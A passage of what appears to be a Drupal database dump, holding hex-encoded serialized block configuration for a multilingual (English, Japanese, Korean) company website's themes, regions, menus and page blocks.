('', 'block.block.claro_page_title', 0x613a31333a7b733a343a2275756964223b733a33363a2265346632373830652d663535342d343261372d616638322d306138313937663061616461223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a353a227468656d65223b613a313a7b693a303b733a353a22636c61726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22664e77446457303633746b5f6b747a53577a5a5665515339777a764c6f6f564f3238304251395772734973223b7d733a323a226964223b733a31363a22636c61726f5f706167655f7469746c65223b733a353a227468656d65223b733a353a22636c61726f223b733a363a22726567696f6e223b733a363a22686561646572223b733a363a22776569676874223b693a2d33303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31363a22706167655f7469746c655f626c6f636b223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a31363a22706167655f7469746c655f626c6f636b223b733a353a226c6162656c223b733a31303a2250616765207469746c65223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a22636f7265223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.claro_primary_local_tasks', 0x613a31333a7b733a343a2275756964223b733a33363a2239303464653337372d343939372d346261322d613564612d326437323965316536353130223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a353a227468656d65223b613a313a7b693a303b733a353a22636c61726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a2241436a425a49357368414d69695570737a2d696e4c59565844714e4e58526e537a415756336b565f384877223b7d733a323a226964223b733a32353a22636c61726f5f7072696d6172795f6c6f63616c5f7461736b73223b733a353a227468656d65223b733a353a22636c61726f223b733a363a22726567696f6e223b733a363a22686561646572223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31373a226c6f63616c5f7461736b735f626c6f636b223b733a383a2273657474696e6773223b613a363a7b733a323a226964223b733a31373a226c6f63616c5f7461736b735f626c6f636b223b733a353a226c6162656c223b733a31323a225072696d6172792074616273223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a22636f7265223b733a373a227072696d617279223b623a313b733a393a227365636f6e64617279223b623a303b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.claro_secondary_local_tasks', 0x613a31333a7b733a343a2275756964223b733a33363a2238383264623739642d366661612d343766372d383966382d356331323233623532326437223b733a383a226c616e67636f6465223b733a323a226a61223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a313a7b733a353a227468656d65223b613a313a7b693a303b733a353a22636c61726f223b7d7d733a353a225f636f7265223b613a313a7b733a31393a2264656661756c745f636f6e6669675f68617368223b733a34333a22324c306765502d69784362436b457057364256463648377644555a4e34656130375f5939436f6369516d34223b7d733a323a226964223b733a32373a22636c61726f5f7365636f6e646172795f6c6f63616c5f7461736b73223b733a353a227468656d65223b733a353a22636c61726f223b733a363a22726567696f6e223b733a31313a227072655f636f6e74656e74223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a31373a226c6f63616c5f7461736b735f626c6f636b223b733a383a2273657474696e6773223b613a363a7b733a323a226964223b733a31373a226c6f63616c5f7461736b735f626c6f636b223b733a353a226c6162656c223b733a31343a225365636f6e646172792074616273223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a343a22636f7265223b733a373a227072696d617279223b623a303b733a393a227365636f6e64617279223b623a313b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.companyhistory', 0x613a31323a7b733a343a2275756964223b733a33363a2233323265633731622d653061612d346266642d623033332d303832316464323935353439223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a34356230386164302d613231372d343363392d613335642d633565396634646362306162223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31343a22636f6d70616e79686973746f7279223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31383a2273756266656174757265735f7365636f6e64223b733a363a22776569676874223b693a2d32303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a34356230386164302d613231372d343363392d613335642d633565396634646362306162223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a34356230386164302d613231372d343363392d613335642d633565396634646362306162223b733a353a226c6162656c223b733a31323a22e4bc9ae7a4bee6b2bfe99da9223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a373a223c66726f6e743e223b7d7d7d),
('', 'block.block.companyhistorytitle', 0x613a31323a7b733a343a2275756964223b733a33363a2235323230353762302d343265662d343030612d616637632d643236353361373736326164223b733a383a226c616e67636f6465223b733a323a226b6f223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a39356234663237392d646134352d343165362d393537382d313733633334663232363731223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31393a22636f6d70616e79686973746f72797469746c65223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22636f6e74656e745f707265666978223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a39356234663237392d646134352d343165362d393537382d313733633334663232363731223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a39356234663237392d646134352d343165362d393537382d313733633334663232363731223b733a353a226c6162656c223b733a32313a22436f6d70616e7920486973746f7279207469746c65223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a33343a222f6e6f64652f32370d0a2f6a612f6e6f64652f32370d0a2f6b6f2f6e6f64652f3237223b7d7d7d),
('', 'block.block.companyprofile', 0x613a31323a7b733a343a2275756964223b733a33363a2234316535633138362d643261342d343038362d623935622d316666366366363936636539223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a61396238303430612d663033662d343261612d623565382d613633656466383561386164223b7d733a363a226d6f64756c65223b613a333a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a383a226c616e6775616765223b693a323b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31343a22636f6d70616e7970726f66696c65223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31373a2273756266656174757265735f6669727374223b733a363a22776569676874223b693a2d32303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a61396238303430612d663033662d343261612d623565382d613633656466383561386164223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a61396238303430612d663033662d343261612d623565382d613633656466383561386164223b733a353a226c6162656c223b733a31323a22e4bc9ae7a4bee68385e5a0b1223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a323a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a373a223c66726f6e743e223b7d733a383a226c616e6775616765223b613a343a7b733a323a226964223b733a383a226c616e6775616765223b733a363a226e6567617465223b623a303b733a31353a22636f6e746578745f6d617070696e67223b613a313a7b733a383a226c616e6775616765223b733a35333a22406c616e67756167652e63757272656e745f6c616e67756167655f636f6e746578743a6c616e67756167655f696e74657266616365223b7d733a393a226c616e67636f646573223b613a333a7b733a323a226a61223b733a323a226a61223b733a323a22656e223b733a323a22656e223b733a323a226b6f223b733a323a226b6f223b7d7d7d7d),
('', 'block.block.companyprofiletitle', 0x613a31323a7b733a343a2275756964223b733a33363a2230316366616461322d633430652d343733612d396330382d663166636637653333373439223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a36613434636562392d336132632d343533622d613638322d393464616239393666373639223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31393a22636f6d70616e7970726f66696c657469746c65223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22636f6e74656e745f707265666978223b733a363a22776569676874223b693a2d31313b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a36613434636562392d336132632d343533622d613638322d393464616239393666373639223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a36613434636562392d336132632d343533622d613638322d393464616239393666373639223b733a353a226c6162656c223b733a32313a22436f6d70616e792050726f66696c65207469746c65223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a31303a222f6e6f64652f32330d0a223b7d7d7d),
('', 'block.block.contactus', 0x613a31323a7b733a343a2275756964223b733a33363a2239643566393032622d616434642d343566372d626535622d346132656461343966333137223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a61326532303832392d333136302d346631322d393738642d393133666265626664613061223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a393a22636f6e746163747573223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31313a226c6561646572626f617264223b733a363a22776569676874223b693a2d31303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a61326532303832392d333136302d346631322d393738642d393133666265626664613061223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a61326532303832392d333136302d346631322d393738642d393133666265626664613061223b733a353a226c6162656c223b733a31303a22436f6e74616374205573223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.contactustitle', 0x613a31323a7b733a343a2275756964223b733a33363a2263313636353835392d646135312d346238382d393265622d393935636138313761316231223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a66346432333239332d623330332d343063342d616535302d646534616163366131623239223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31343a22636f6e7461637475737469746c65223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22636f6e74656e745f707265666978223b733a363a22776569676874223b693a2d31323b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a66346432333239332d623330332d343063342d616535302d646534616163366131623239223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a66346432333239332d623330332d343063342d616535302d646534616163366131623239223b733a353a226c6162656c223b733a31363a22436f6e74616374205573207469746c65223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a383a222f6e6f64652f3131223b7d7d7d),
('', 'block.block.contactus_2', 0x613a31323a7b733a343a2275756964223b733a33363a2235306362623731342d326166652d343731362d613436352d666330653962636530616433223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a39393061333931322d346636352d343833612d383338382d653264616239396661316663223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31313a22636f6e7461637475735f32223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31373a2273756266656174757265735f7468697264223b733a363a22776569676874223b693a2d31393b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a39393061333931322d346636352d343833612d383338382d653264616239396661316663223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a39393061333931322d346636352d343833612d383338382d653264616239396661316663223b733a353a226c6162656c223b733a31323a22e4bc9ae7a4bee6a682e8a681223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a373a223c66726f6e743e223b7d7d7d),
('', 'block.block.copyright', 0x613a31323a7b733a343a2275756964223b733a33363a2266303031353464302d646435642d343435612d623833302d346261343330383066613766223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a66613166353536662d303538652d343337352d613361342d303232306135633431653663223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a393a22636f70797269676874223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31323a22666f6f7465725f6669727374223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a66613166353536662d303538652d343337352d613361342d303232306135633431653663223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a66613166353536662d303538652d343337352d613361342d303232306135633431653663223b733a353a226c6162656c223b733a393a22436f70797269676874223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.facebook', 0x613a31323a7b733a343a2275756964223b733a33363a2238313434366564372d346230642d343062392d383631392d643664393532623038653161223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a66343935633632352d633834642d343530332d616532332d306138336663356131333663223b7d733a363a226d6f64756c65223b613a313a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a383a2266616365626f6f6b223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31333a22666f6f7465725f7365636f6e64223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a66343935633632352d633834642d343530332d616532332d306138336663356131333663223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a66343935633632352d633834642d343530332d616532332d306138336663356131333663223b733a353a226c6162656c223b733a383a2246616365626f6f6b223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.futuregoal', 0x613a31323a7b733a343a2275756964223b733a33363a2239393132333238312d633564352d346331642d613161612d643037663930326236646461223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a64643132383365312d623365352d346265662d383464652d303963316438393238346166223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31303a22667574757265676f616c223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31373a2273756266656174757265735f7468697264223b733a363a22776569676874223b693a2d32303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a64643132383365312d623365352d346265662d383464652d303963316438393238346166223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a64643132383365312d623365352d346265662d383464652d303963316438393238346166223b733a353a226c6162656c223b733a31353a22e4bc9ae7a4bee381aee79baee6a899223b733a31333a226c6162656c5f646973706c6179223b733a373a2276697369626c65223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a373a223c66726f6e743e223b7d7d7d),
('', 'block.block.futuregoaltitle', 0x613a31323a7b733a343a2275756964223b733a33363a2233656264343035332d656461302d343138382d386438382d666132343064653338373930223b733a383a226c616e67636f6465223b733a323a226b6f223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a32633637616533302d363630622d346537642d623530622d663963666536323061663231223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31353a22667574757265676f616c7469746c65223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22636f6e74656e745f707265666978223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a32633637616533302d363630622d346537642d623530622d663963666536323061663231223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a32633637616533302d363630622d346537642d623530622d663963666536323061663231223b733a353a226c6162656c223b733a31373a2246757475726520476f616c207469746c65223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a383a222f6e6f64652f3236223b7d7d7d),
('', 'block.block.languagedropdownswitcher', 0x613a31323a7b733a343a2275756964223b733a33363a2236356430623862332d353338312d343530332d383730362d616235343163376365356364223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a31333a226c616e675f64726f70646f776e223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a32343a226c616e677561676564726f70646f776e7377697463686572223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31333a226865616465725f7365636f6e64223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a34323a226c616e67756167655f64726f70646f776e5f626c6f636b3a6c616e67756167655f696e74657266616365223b733a383a2273657474696e6773223b613a31353a7b733a323a226964223b733a34323a226c616e67756167655f64726f70646f776e5f626c6f636b3a6c616e67756167655f696e74657266616365223b733a353a226c6162656c223b733a32363a224c616e67756167652064726f70646f776e207377697463686572223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a226c616e675f64726f70646f776e223b733a373a2273686f77616c6c223b623a303b733a31333a22686964655f6f6e6c795f6f6e65223b623a313b733a363a22746f686f6d65223b623a303b733a353a227769647468223b693a3136353b733a373a22646973706c6179223b693a313b733a363a22776964676574223b693a303b733a31303a226d7364726f70646f776e223b613a363a7b733a31323a2276697369626c655f726f7773223b693a353b733a373a22726f756e646564223b623a313b733a393a22616e696d6174696f6e223b733a393a22736c696465446f776e223b733a353a226576656e74223b733a353a22636c69636b223b733a343a22736b696e223b733a373a226c6473536b696e223b733a31313a22637573746f6d5f736b696e223b733a303a22223b7d733a363a2263686f73656e223b613a323a7b733a31343a2264697361626c655f736561726368223b623a313b733a31353a226e6f5f726573756c74735f74657874223b733a31373a224e6f206c616e6775616765206d61746368223b7d733a373a226464736c69636b223b613a353a7b733a31343a226464736c69636b5f686569676874223b693a303b733a31363a2273686f7753656c656374656448544d4c223b623a313b733a31333a22696d616765506f736974696f6e223b733a343a226c656674223b733a343a22736b696e223b733a31303a2264647344656661756c74223b733a31313a22637573746f6d5f736b696e223b733a303a22223b7d733a31333a226c616e677561676569636f6e73223b613a313a7b733a31333a22666c61675f706f736974696f6e223b693a313b7d733a31363a2268696464656e5f6c616e677561676573223b613a303a7b7d7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.mainmenu', 0x613a31323a7b733a343a2275756964223b733a33363a2234396637373965302d386532652d346632622d383564312d346530356162303436396331223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a323a7b733a363a226d6f64756c65223b613a313a7b693a303b733a31313a2277655f6d6567616d656e75223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a383a226d61696e6d656e75223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31333a226865616465725f7365636f6e64223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a32373a2277655f6d6567616d656e755f626c6f636b3a6d61696e2d6d656e75223b733a383a2273657474696e6773223b613a343a7b733a323a226964223b733a32373a2277655f6d6567616d656e755f626c6f636b3a6d61696e2d6d656e75223b733a353a226c6162656c223b733a393a224d61696e204d656e75223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31313a2277655f6d6567616d656e75223b7d733a31303a227669736962696c697479223b613a303a7b7d7d),
('', 'block.block.missionvisiontitle', 0x613a31323a7b733a343a2275756964223b733a33363a2261346464343433662d636138622d343539612d616339612d623263656236653038356466223b733a383a226c616e67636f6465223b733a323a226b6f223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a31333863336133352d626232642d343163392d393066322d633431306331653439653261223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31383a226d697373696f6e766973696f6e7469746c65223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31343a22636f6e74656e745f707265666978223b733a363a22776569676874223b693a303b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a31333863336133352d626232642d343163392d393066322d633431306331653439653261223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a31333863336133352d626232642d343163392d393066322d633431306331653439653261223b733a353a226c6162656c223b733a32343a22e79baee6a899202620e3839fe38383e382b7e383a7e383b3223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b733a303a22223b733a393a22766965775f6d6f6465223b733a343a2266756c6c223b7d733a31303a227669736962696c697479223b613a313a7b733a31323a22726571756573745f70617468223b613a333a7b733a323a226964223b733a31323a22726571756573745f70617468223b733a363a226e6567617465223b623a303b733a353a227061676573223b733a383a222f6e6f64652f3235223b7d7d7d),
('', 'block.block.moreactivity', 0x613a31323a7b733a343a2275756964223b733a33363a2237393238323533632d313866332d346466372d623537312d326666623431623838623135223b733a383a226c616e67636f6465223b733a323a22656e223b733a363a22737461747573223b623a313b733a31323a22646570656e64656e63696573223b613a333a7b733a373a22636f6e74656e74223b613a313a7b693a303b733a35363a22626c6f636b5f636f6e74656e743a62617369633a38626565383432332d323332652d346534622d383336632d323661616565643562376331223b7d733a363a226d6f64756c65223b613a323a7b693a303b733a31333a22626c6f636b5f636f6e74656e74223b693a313b733a363a2273797374656d223b7d733a353a227468656d65223b613a313a7b693a303b733a393a226e65775f636f6d6574223b7d7d733a323a226964223b733a31323a226d6f72656163746976697479223b733a353a227468656d65223b733a393a226e65775f636f6d6574223b733a363a22726567696f6e223b733a31353a2266656174757265735f7365636f6e64223b733a363a22776569676874223b693a2d383b733a383a2270726f7669646572223b4e3b733a363a22706c7567696e223b733a35303a22626c6f636b5f636f6e74656e743a38626565383432332d323332652d346534622d383336632d323661616565643562376331223b733a383a2273657474696e6773223b613a373a7b733a323a226964223b733a35303a22626c6f636b5f636f6e74656e743a38626565383432332d323332652d346534622d383336632d323661616565643562376331223b733a353a226c6162656c223b733a31333a224d6f7265206163746976697479223b733a31333a226c6162656c5f646973706c6179223b733a313a2230223b733a383a2270726f7669646572223b733a31333a22626c6f636b5f636f6e74656e74223b733a363a22737461747573223b623a313b733a343a22696e666f223b